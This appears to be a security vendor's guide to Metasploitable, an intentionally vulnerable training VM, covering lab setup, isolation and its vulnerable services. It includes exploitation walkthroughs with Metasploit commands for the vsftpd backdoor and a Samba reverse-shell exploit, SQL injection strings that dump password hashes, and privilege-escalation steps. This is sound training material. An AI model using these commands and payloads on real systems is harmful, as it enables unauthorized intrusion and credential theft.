Metasploitable is the most widely used intentionally vulnerable virtual machine for penetration testing training and security education. This comprehensive guide covers Metasploitable setup, vulnerability exploitation, training exercises, and how security professionals use Metasploitable for hands-on practice developing offensive security skills in safe, legal environment.
What is Metasploitable?
Metasploitable is an intentionally vulnerable Linux-based virtual machine created by Rapid7 (makers of Metasploit Framework) specifically for security training. It contains dozens of deliberately insecure services, applications, and configurations allowing aspiring penetration testers, security students, and ethical hackers to practice exploitation techniques without legal or ethical concerns.
Metasploitable serves as safe target for learning offensive security skills, from basic reconnaissance and vulnerability scanning through exploitation, privilege escalation, and post-exploitation techniques. It's completely free, widely supported by security training materials, and used in courses from beginner to advanced levels including OSCP preparation, CEH training, and university security programs.
Metasploitable Versions
| Version | OS | Released | Key Features |
|---|---|---|---|
| Metasploitable 2 | Ubuntu 8.04 | 2012 | 30+ vulnerabilities, most popular version |
| Metasploitable 3 (Linux) | Ubuntu 14.04 | 2016 | Modern vulnerabilities, realistic configurations |
| Metasploitable 3 (Windows) | Server 2008 R2 | 2016 | Windows-specific vulnerabilities, AD environment |
Setting Up Metasploitable
Requirements
- Virtualization Software: VMware Workstation/Fusion, VirtualBox, or Hyper-V
- Host OS: Windows, macOS, or Linux
- RAM: 2GB minimum (4GB+ recommended for attacker VM + Metasploitable)
- Disk Space: 8GB for Metasploitable 2, 20GB+ for Metasploitable 3
- Network: Host-only or internal network (isolated from internet)
Installing Metasploitable 2
- Download: Get Metasploitable 2 from SourceForge or Rapid7 website (~800MB)
- Extract: Unzip downloaded file to get VM disk image
- Import to Virtualization Software: Create new VM, attach existing disk
- Network Configuration: Set network adapter to Host-Only or Internal Network
- Start VM: Boot Metasploitable (auto-login or use msfadmin/msfadmin)
- Verify IP: Run
ifconfigto note IP address
# Default Metasploitable 2 Credentials
Username: msfadmin
Password: msfadmin
# Check IP address
ifconfig
# Verify vulnerable services running
netstat -tulpnInstalling Metasploitable 3
Metasploitable 3 requires building from source using Packer and Vagrant:
- Install Prerequisites: Packer, Vagrant, VirtualBox
- Clone Repository:
git clone https://github.com/rapid7/metasploitable3.git - Build VM:
./build.sh(Linux/Mac) orbuild.ps1(Windows) - Start VM:
vagrant up - Configure Network: Set to host-only networking
Network Isolation
Critical security practice when using Metasploitable:
- Host-Only Network: VMs communicate with host only, not internet
- Internal Network: VMs communicate with each other, not host or internet
- Snapshots: Take VM snapshot before testing for easy reset
- Firewall Rules: Ensure host firewall blocks VM internet access
- Never Bridge: Don't use bridged networking (exposes to LAN)
Professional Penetration Testing Training
subrosa provides hands-on security training teaching practical penetration testing skills using vulnerable environments.
Get Security TrainingMetasploitable 2 Vulnerabilities
Network Services Vulnerabilities
| Service | Port | Vulnerability | Difficulty |
|---|---|---|---|
| FTP (vsftpd 2.3.4) | 21 | Backdoor command execution | Easy |
| SSH (OpenSSH) | 22 | Weak credentials, brute force | Easy |
| Telnet | 23 | Cleartext authentication | Easy |
| SMTP (Postfix) | 25 | User enumeration, open relay | Easy |
| HTTP (Apache) | 80 | Multiple web app vulnerabilities | Easy-Hard |
| Samba | 139, 445 | Multiple RCE vulnerabilities | Easy-Medium |
| MySQL | 3306 | Weak root password, no auth | Easy |
| PostgreSQL | 5432 | Weak authentication | Easy |
| VNC | 5900 | No authentication | Easy |
| Distcc | 3632 | Remote code execution | Easy |
Web Application Vulnerabilities
Metasploitable 2 includes numerous vulnerable web applications:
- DVWA (Damn Vulnerable Web Application): SQL injection, XSS, CSRF, file upload
- Mutillidae: OWASP Top 10 vulnerabilities
- WebDAV: File upload and exploitation
- TWiki: Command injection
- phpMyAdmin: SQL injection, authentication bypass
Exploitation Walkthroughs
Example 1: vsftpd 2.3.4 Backdoor
One of easiest exploits demonstrating Metasploit Framework usage:
# Start Metasploit
msfconsole
# Search for vsftpd exploit
search vsftpd
# Use the backdoor exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set target IP
set RHOSTS 192.168.1.100
# Run exploit
exploit
# You now have root shell on Metasploitable!Example 2: Samba Usermap Script
# Use Samba exploit
use exploit/multi/samba/usermap_script
# Configure options
set RHOSTS 192.168.1.100
set PAYLOAD cmd/unix/reverse
# Set callback IP (your attack machine)
set LHOST 192.168.1.50
# Exploit
exploit
# Root shell obtainedExample 3: SQL Injection in DVWA
- Navigate to http://[metasploitable-ip]/dvwa/
- Login with admin/password
- Set security to "Low"
- Go to SQL Injection page
- Test injection:
1' OR '1'='1 - Dump database:
1' UNION SELECT user,password FROM users# - Crack password hashes with John the Ripper or hashcat
Example 4: Privilege Escalation
# After getting low-privilege shell
# Check kernel version
uname -a
# Search for local privilege escalation exploits
searchsploit linux kernel 2.6
# Download and compile exploit
gcc -o exploit exploit.c
# Run exploit
./exploit
# Root shell achieved!Training Exercises
Beginner Exercises
- Network Scanning:
- Use Nmap to discover open ports
- Identify running services and versions
- Perform OS fingerprinting
- Service Enumeration:
- Enumerate SMB shares with smbclient
- Enumerate users via SMTP VRFY command
- Identify web technologies with Nikto
- Basic Exploitation:
- Exploit vsftpd backdoor with Metasploit
- Brute force SSH with Hydra
- Access unprotected VNC session
Intermediate Exercises
- Web Application Testing:
- Perform SQL injection in DVWA
- Execute XSS attacks in Mutillidae
- Upload web shell via file upload vulnerability
- Exploit command injection in TWiki
- Manual Exploitation:
- Exploit Samba vulnerability without Metasploit
- Write custom exploit scripts
- Develop proof-of-concept exploits
- Post-Exploitation:
- Enumerate system information
- Dump password hashes
- Establish persistence mechanisms
- Lateral movement practice
Advanced Exercises
- Full Attack Chain:
- Initial reconnaissance
- Vulnerability identification
- Exploitation
- Privilege escalation
- Maintain access
- Cover tracks
- Custom Tool Development:
- Write custom Metasploit modules
- Develop automated exploitation scripts
- Create payload encoders
- Reporting Practice:
- Document all findings
- Write professional penetration test report
- Provide remediation recommendations
Professional Penetration Testing Services
subrosa provides expert penetration testing services identifying real vulnerabilities in production environments.
Get Penetration TestingLearning Resources
Recommended Tools
| Tool | Purpose | Use Case |
|---|---|---|
| Nmap | Network scanning | Port discovery, service enumeration |
| Metasploit | Exploitation framework | Automated exploitation, payload delivery |
| Burp Suite | Web app testing | Proxy, scanner, repeater |
| SQLmap | SQL injection | Automated SQL injection testing |
| Hydra | Password cracking | Brute force attacks |
| John the Ripper | Hash cracking | Password hash cracking |
| Nikto | Web server scanning | Web vulnerability scanning |
| Wireshark | Packet analysis | Network traffic inspection |
Online Courses Using Metasploitable
- Offensive Security (OSCP): Uses vulnerable VMs including Metasploitable principles
- Cybrary: Free courses covering Metasploitable exploitation
- Udemy: Multiple ethical hacking courses using Metasploitable
- PentesterLab: Hands-on exercises with vulnerable systems
- HackTheBox/TryHackMe: Similar vulnerable machines for practice
Beyond Metasploitable
Similar Training Platforms
| Platform | Type | Best For |
|---|---|---|
| HackTheBox | Online labs | Realistic CTF challenges |
| TryHackMe | Guided learning | Structured learning paths |
| VulnHub | Vulnerable VMs | Free downloadable challenges |
| DVWA | Web app | Web application security |
| WebGoat | Web app | OWASP vulnerabilities |
| bWAPP | Web app | 100+ web vulnerabilities |
| Pentester Lab | Online exercises | Hands-on exploitation practice |
Progression Path
- Start: Metasploitable 2 (basic vulnerabilities, guided tutorials)
- Intermediate: Metasploitable 3 (realistic configurations, modern vulns)
- Advanced: VulnHub machines (realistic scenarios, harder challenges)
- Expert: HackTheBox (community challenges, updated regularly)
- Professional: Real-world penetration testing engagements
Best Practices
Lab Safety
- Network Isolation: Never connect Metasploitable to internet or production networks
- Host-Only Networking: Use isolated virtual networks only
- Snapshots: Take VM snapshots before major changes
- Regular Resets: Reset to clean state between exercises
- Documentation: Keep notes of what you learn
Learning Tips
- Understand Before Automating: Manually exploit vulnerabilities before using automated tools
- Read Source Code: Examine vulnerable application code to understand flaws
- Practice Reporting: Document findings professionally
- Try Multiple Paths: Exploit same vulnerability different ways
- Research Deeply: Understand why vulnerabilities exist and how to prevent them
Ethical Considerations
- Only practice on systems you own or have explicit permission to test
- Never use learned techniques against unauthorized targets
- Understand legal implications of hacking
- Follow responsible disclosure for real vulnerabilities discovered
- Use skills to improve security, not cause harm
Frequently Asked Questions
What is Metasploitable?
Metasploitable is an intentionally vulnerable Linux virtual machine created by Rapid7 for security training and penetration testing practice. It contains dozens of deliberately insecure services, applications, and configurations allowing security professionals, students, and ethical hackers to practice exploitation techniques in safe, legal environment. Current versions include Metasploitable 2 (Ubuntu 8.04 with 30+ vulnerabilities) and Metasploitable 3 (Windows Server 2008 and Ubuntu 14.04 with modern vulnerabilities). Metasploitable is completely free, widely used in security training courses, and provides hands-on experience with real-world vulnerabilities without risk of legal issues or production system damage.
Is Metasploitable legal to use?
Yes, Metasploitable is completely legal when used properly in isolated lab environments for security training and testing. It was specifically created by Rapid7 for this purpose and is freely distributed. However, legal use requires: (1) Only testing on your own systems or systems you have explicit authorization to test; (2) Never exposing Metasploitable to internet or production networks; (3) Using host-only or internal networking for complete isolation; (4) Never using learned techniques against unauthorized targets; (5) Understanding that unauthorized hacking is illegal regardless of tools used. Metasploitable provides safe, legal way to learn offensive security skills, but those skills must only be applied ethically and legally.
What's the difference between Metasploitable 2 and 3?
Metasploitable 2 (released 2012) is Ubuntu 8.04 virtual machine with 30+ deliberately vulnerable services including vsftpd backdoor, Samba exploits, SQL injection, weak credentials, and outdated web applications, ideal for beginners learning basic exploitation. Metasploitable 3 (released 2016) includes both Linux (Ubuntu 14.04) and Windows (Server 2008 R2) versions with more realistic, modern vulnerabilities including web application flaws, Windows Active Directory misconfigurations, and contemporary exploits, better for intermediate learners. Metasploitable 3 requires building from source using Packer/Vagrant while Metasploitable 2 downloads as ready-to-use VM image. Most beginners start with Metasploitable 2 for simplicity and extensive online tutorials.
Can I run Metasploitable on VirtualBox?
Yes, Metasploitable runs perfectly on VirtualBox, which is free virtualization software available for Windows, macOS, and Linux. Download Metasploitable 2 as .vmdk disk image, create new VM in VirtualBox, attach the disk, configure host-only networking for isolation, and start the VM. Default credentials are msfadmin/msfadmin. For Metasploitable 3, use Vagrant with VirtualBox provider following build instructions from GitHub repository. VirtualBox is actually recommended platform for beginners due to being free and cross-platform. Key requirement: configure network adapter to Host-Only or Internal Network (never Bridged) to ensure complete isolation from internet and local network.
What can I learn from Metasploitable?
Metasploitable teaches comprehensive offensive security skills: (1) Reconnaissance, network scanning with Nmap, service enumeration, OS fingerprinting; (2) Vulnerability identification, discovering vulnerabilities through manual testing and automated scanning; (3) Exploitation, using Metasploit Framework, manual exploitation, developing custom exploits; (4) Web application security, SQL injection, XSS, CSRF, file upload vulnerabilities, authentication bypass; (5) Privilege escalation, local exploits, kernel vulnerabilities, configuration weaknesses; (6) Post-exploitation, maintaining access, data exfiltration, lateral movement; (7) Password cracking, hash extraction, John the Ripper, brute forcing; (8) Reporting, documenting findings professionally for penetration test reports. Essential foundation for certifications like OSCP, CEH, and GPEN.
Do I need Kali Linux to use Metasploitable?
While Kali Linux is recommended and most convenient (includes all necessary tools pre-installed), you don't strictly need it. Metasploitable can be attacked from any operating system with penetration testing tools installed: Windows with WSL and security tools, macOS with Homebrew-installed tools, or any Linux distribution with tools installed manually. However, Kali Linux (or Parrot OS) provides significant advantages: pre-installed Metasploit Framework, Nmap, Burp Suite, SQLmap, Hydra, and 600+ other security tools; optimized configuration for penetration testing; extensive documentation and community support; and it runs well in VirtualBox alongside Metasploitable. Most training materials assume Kali Linux, making it easiest choice for beginners.
How do I reset Metasploitable after exploiting it?
Reset Metasploitable using virtual machine snapshots or restore from backup: (1) Take snapshot before starting practice session using VM software's snapshot feature; (2) After completing exercises, power off Metasploitable; (3) Restore to clean snapshot through VM manager; (4) Start VM fresh for next session. Alternatively, keep original .vmdk file as backup and copy it when reset needed. For Metasploitable 3 built with Vagrant, run vagrant destroy then vagrant up to rebuild from scratch. Regular resets prevent issues from accumulating exploits, maintain consistent starting state for practice, and allow repeating same exercises multiple times. Best practice: take multiple snapshots at different states (clean install, after basic config, etc.) for flexibility.
What certifications prepare you for using Metasploitable?
Metasploitable helps prepare for offensive security certifications: OSCP (Offensive Security Certified Professional), hands-on exam requiring exploiting vulnerable machines similar to Metasploitable; CEH (Certified Ethical Hacker), covers tools and techniques practiced on Metasploitable; GPEN (GIAC Penetration Tester), practical penetration testing skills including exploitation; eJPT (eLearnSecurity Junior Penetration Tester), beginner certification using vulnerable labs; CompTIA PenTest+, vendor-neutral penetration testing certification. Metasploitable provides essential hands-on practice for these exams, particularly OSCP which requires demonstrating exploitation skills in timed practical exam. Practice on Metasploitable builds confidence and muscle memory for certification exams.
Can Metasploitable be used for CTF practice?
Yes, Metasploitable provides excellent Capture The Flag (CTF) practice for jeopardy-style competitions focusing on exploitation challenges. While not specifically designed as CTF platform, Metasploitable's vulnerable services and applications map well to common CTF categories: pwn (exploitation challenges using vulnerable services), web (SQL injection, XSS, file upload in DVWA/Mutillidae), crypto (cracking password hashes), forensics (analyzing exploited system artifacts), and reverse engineering (examining vulnerable applications). However, dedicated CTF platforms like HackTheBox, TryHackMe, and CTFtime provide more CTF-specific challenges with flags, scoring, and competitive elements. Use Metasploitable to build fundamental exploitation skills, then progress to CTF platforms for competition-style challenges and more realistic scenarios.
Should I learn Metasploitable before real penetration testing?
Absolutely, Metasploitable is essential training ground before attempting real-world penetration testing. It provides safe environment to: (1) Learn tools without production system risk; (2) Practice exploitation techniques legally and ethically; (3) Understand vulnerability mechanics deeply; (4) Make mistakes without consequences; (5) Build confidence before client engagements; (6) Develop muscle memory for common tasks. Professional penetration testers typically progress: foundational training on Metasploitable and similar platforms → certifications (OSCP, CEH) → junior role with supervision → independent testing. Never attempt unauthorized testing on production systems, legal and career consequences are severe. Metasploitable and similar platforms provide path from beginner to professional without legal risk. subrosa provides professional penetration testing services when you need expert assessment of production environments.
Conclusion
Metasploitable represents essential training resource for aspiring penetration testers, security students, and anyone developing offensive security skills. Its intentionally vulnerable design provides safe, legal environment to practice reconnaissance, exploitation, privilege escalation, and post-exploitation techniques foundational to professional penetration testing, without risk of legal issues or production system damage.
Starting with Metasploitable 2's basic vulnerabilities and progressing through Metasploitable 3's realistic configurations provides structured learning path from beginner to intermediate offensive security skills. Combined with proper documentation practice, ethical considerations, and complementary training resources, Metasploitable experience prepares security professionals for certifications like OSCP, real-world penetration testing engagements, and defensive security roles understanding attacker methodologies.
Remember that skills learned through Metasploitable carry significant responsibility, use offensive security knowledge exclusively for authorized testing, improving security defenses, and protecting organizations from real threats. Never apply these techniques against unauthorized targets, always maintain ethical standards, and consider how offensive skills contribute to broader cybersecurity mission of protecting systems and data.
subrosa provides professional penetration testing services delivering expert security assessments of production environments, and security training programs teaching offensive and defensive skills through hands-on exercises, vulnerable environments, and real-world scenarios preparing teams for modern threat landscape.